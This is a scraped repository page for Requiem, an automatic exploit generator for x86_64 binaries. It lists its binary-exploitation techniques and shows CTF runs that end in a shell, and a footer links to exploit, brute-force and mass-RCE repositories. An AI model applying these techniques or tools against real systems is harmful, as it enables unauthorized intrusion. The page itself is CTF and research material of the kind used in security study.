🎻 Modularized exploit generation framework

Overview

Modularized exploit generation framework for x86_64 binaries


Overview

This project is still at early stage of development, so you might want to come back later...


Requiem is a modularized exploit generator for x86_64 binaries which emulates the target program with Qiling, and uses the user-provided PoC as the target program's input. During the target program's execution, Requiem monitors its I/O-related behaviors and employs taint analysis to collect information that can be later used for exploitation.

To use Requiem, a PoC must be provided because Requiem cannot perform symbolic execution. The target program will follow the execution path formed by the PoC, and when the target program reaches the crash state, Requiem will determine whether the crash state is exploitable by checking if RIP has been tainted.


If RIP has been tainted at the crash state, Requiem will generate an exploit which:

  • guides the target program to the exploitable state
  • exploits the program based on the strategy specified by the user.

Modularized?

Def: An exploitation "strategy" consists of a list of exploitation "techniques".

The idea is to implement some well-known exploitation techniqes as reusable and configurable "modules". The user can use the built-in techniques to exploit a x86_64 binary, or write a custom strategy/techniques to deal with Ad-hoc problems.

Implemented Techniques

  • ret2win (return to an arbitrary function specified by the user)
  • ret2csu (handling of different variants of __libc_csu_init is not implemented yet)
  • basic stack pivot (read(0, bss+n, 1024), pop rbp ; ret, leave ret)
  • advanced stack pivot (requires at least one call site of read())
  • GOT partial overwrite (overwrite LSB of [email protected] to acquire syscall, then sys_execve("/bin/sh", 0, 0))
  • mprotect + shellcode
  • ret2dlresolve
  • simple ASLR bypass (leak PIE/libc base addresses using available read primitives)
  • advanced ASLR bypass (leak PIE/libc base addresses with _IO_file_write when there are no read primitives)
  • ...

Implemented PoC Types

  • stdin
  • file
  • socket
  • ...

Dependencies

Installation

git clone https://github.com/aesophor/requiem
cd requiem
git submodule update --init --recursive

Examples

1. pwnable.tw: unexploitable (500 PTS)

The original challenge is on pwnable.kr and it is solvable.
This time we fix the vulnerability and now we promise that the service is unexploitable.

source

#include <stdio.h>
#include <unistd.h>

int main() {
    sleep(3);
    char buf[4];
    read(0, buf, 256);
}

checksec

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

result

$ ./requiem.py 'examples/unexploitable/unexploitable' 'examples/unexploitable/poc' --exec
--- Requiem: Modularized Exploit Generation Framework ---
Developed by: Marco Wang <[email protected]>

(skipped a few lines)

[x]    Error: PC(0x4141414141414141) Unreachable
[x]    RIP tainted. Generating exploit...
[=]    Generating exploit...
[=]    Deduced offset: 4 bytes
write primitives: [[4198745, 140737488412076, 256]]
write primitives: [[4198745, 140737488412076, 256]]
[=]    Generated exploit: examples/unexploitable/unexploitable_exploit.py
[=]    Executing exploit: examples/unexploitable/unexploitable_exploit.py
================================================================================
[+] Starting local process '/home/aesophor/Code/requiem/examples/unexploitable/unexploitable': pid 402588
[*] Switching to interactive mode
$ ls
README.md  examples  libs  requiem  requiem.py
$

2. CS 2017 Fall: readme

The length of stack-buffer overflow is very limited.
Only the saved RBP and the return address is controllable by the attacker.

source

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    char buf[0x20];
    setvbuf(stdout, 0, _IONBF, 0);
    printf("overflow me:");
    read(0, buf, 0x30);
}

checksec

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

result

$ ./requiem.py 'examples/readme/readme' 'examples/readme/poc' --exec
--- Requiem: Modularized Exploit Generation Framework ---
Developed by: Marco Wang <[email protected]>

(skipped a few lines)

[x]    Error: PC(0x4141414141414141) Unreachable
[x]    RIP tainted. Generating exploit...
[=]    Generating exploit...
[=]    Deduced offset: 32 bytes
write primitives: [[4198801, 140737488412064, 48]]
write primitives: [[4198801, 140737488412064, 48]]
[=]    Generated exploit: examples/readme/readme_exploit.py
[=]    Executing exploit: examples/readme/readme_exploit.py
================================================================================
[+] Starting local process '/home/aesophor/Code/requiem/examples/readme/readme': pid 402513
[*] Switching to interactive mode
overflow me:$ ls
README.md  examples  libs  requiem  requiem.py
$
Owner
ᴀᴇꜱᴏᴘʜᴏʀ
M.S. Student @ NCTU. Interested in modern C++, kernel and pwning.
ᴀᴇꜱᴏᴘʜᴏʀ
TightVNC Vulnerability.

CVE-2022-23967 In TightVNC 1.3.10, there is an integer signedness error and resultant heap-based buffer overflow in InitialiseRFBConnection in rfbprot

MaherAzzouzi 15 Jul 11, 2022
2022-bridge - Example code belonging to the Bridge pattern video

Let's Take The Bridge Pattern To The Next Level This video covers how the bridge

11 Jun 14, 2022
Python exploit for vsftpd 2.3.4 - Backdoor Command Execution

CVE-2011-2523 - vsftpd 2.3.4 Exploit Discription vsftpd, which stands for Very Secure FTP Daemon,is an FTP server for Unix-like systems, including Lin

Padsala Tushal 5 Nov 08, 2022
This is a simple Port Flooder written in Python 3.

This is a simple Port Flooder written in Python 3. Use this tool to quickly stress test your network devices and measure your router's or server's load.

Júlio Carneiro 4 Feb 20, 2022
A python script to brute-force guess the passwords to Instagram accounts

Instagram-Brute-Force The purpose of this script is to brute-force guess the passwords to Instagram accounts. Specifics: Comes with 2 separate modes i

Moondog 2 Nov 16, 2021
Dumps the payload.bin image found in Android update images.

payload dumper Dumps the payload.bin image found in Android update images. Has significant performance gains over other tools due to using multiproces

Rasmus 7 Nov 17, 2022
GitHub Advance Security Compliance Action

advanced-security-compliance This Action was designed to allow users to configure their Risk threshold for security issues reported by GitHub Code Sca

Mathew Payne 121 Dec 14, 2022
A great and handy python obfuscator for protecting code.

Python Code Obfuscator A handy and necessary tool that can protect your code anytime! Mostly Command Line tool that will obfuscate your code. Features

Karim 5 Nov 18, 2022
CVE-2022-22965 : about spring core rce

CVE-2022-22965: Spring-Core-Rce EXP 特性: 漏洞探测(不写入 webshell,简单字符串输出) 自定义写入 webshell 文件名称及路径 不会追加写入到同一文件中,每次检测写入到不同名称 webshell 文件 支持写入 冰蝎 webshell 代理支持,可

东方有鱼名为咸 53 Nov 09, 2022
Web Headers Security Scanner

Web Headers Security Scanner

Emre Koybasi 3 Dec 16, 2022
Log4j2 intranet scan

Log4j2-intranet-scan ⚠️ 免责声明 本项目仅面向合法授权的企业安全建设行为,在使用本项目进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权 如您在使用本项目的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任 在使用本项目前,请您务

k3rwin 16 Dec 19, 2022
Raphael is a vulnerability scanning tool based on Python3.

Raphael Raphael是一款基于Python3开发的插件式漏洞扫描工具。 Raphael is a vulnerability scanning too

b4zinga 5 Mar 21, 2022
Analyse a forensic target (such as a directory) to find and report files found and not found from CIRCL hashlookup public service

Analyse a forensic target (such as a directory) to find and report files found and not found from CIRCL hashlookup public service. This tool can help a digital forensic investigator to know the conte

hashlookup 96 Dec 20, 2022
On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.

ApacheRCE ApacheRCE is a small little python script that will allow you to input the apache version 2.4.49-2.4.50 and then input a list of ip addresse

3 Dec 04, 2022
log4j2 passive burp rce scanning tool get post cookie full parameter recognition

log4j2_burp_scan 自用脚本log4j2 被动 burp rce扫描工具 get post cookie 全参数识别,在ceye.io api速率限制下,最大线程扫描每一个参数,记录过滤已检测地址,重复地址 token替换为你自己的http://ceye.io/ token 和域名地址

5 Dec 10, 2021
Dome - Subdomain Enumeration Tool. Fast and reliable python script that makes active and/or passive scan to obtain subdomains and search for open ports.

DOME - A subdomain enumeration tool Check the Spanish Version Dome is a fast and reliable python script that makes active and/or passive scan to obtai

Vadi 329 Jan 01, 2023
Pgen is the best brute force password generator and it is improved from the cupp.py

pgen Pgen is the best brute force password generator and it is improved from the cupp.py The pgen tool is dedicated to Leonardo da Vinci -Time stays l

heyheykids 2 Jan 31, 2022
This repository detects a system vulnerable to CVE-2022-21907 and protects against this vulnerability if desired

This repository detects a system vulnerable to CVE-2022-21907 and protects against this vulnerability if desired

26 Dec 26, 2022
An intranet tool for easily intranet pentesting

IntarKnife v1.0 a tool can be used in intarnet for easily pentesting moudle hash spray U can use this tool to spray hash on a webshell IntraKnife.exe

4 Nov 24, 2021
Getting my gitlab commit history into github

🔰 ᵀᴱᴸᴱᴳᴿᴬᴹ ᴴᴬᶜᴷ ᴮᴼᵀ 🔰 The owner would not be responsible for any kind of bans due to the bot. • ⚡ INSTALLING ⚡ • • 🛠️ Lᴀɴɢᴜᴀɢᴇs Aɴᴅ Tᴏᴏʟs 🔰 • If

Santiago Chiesa 1 Dec 24, 2021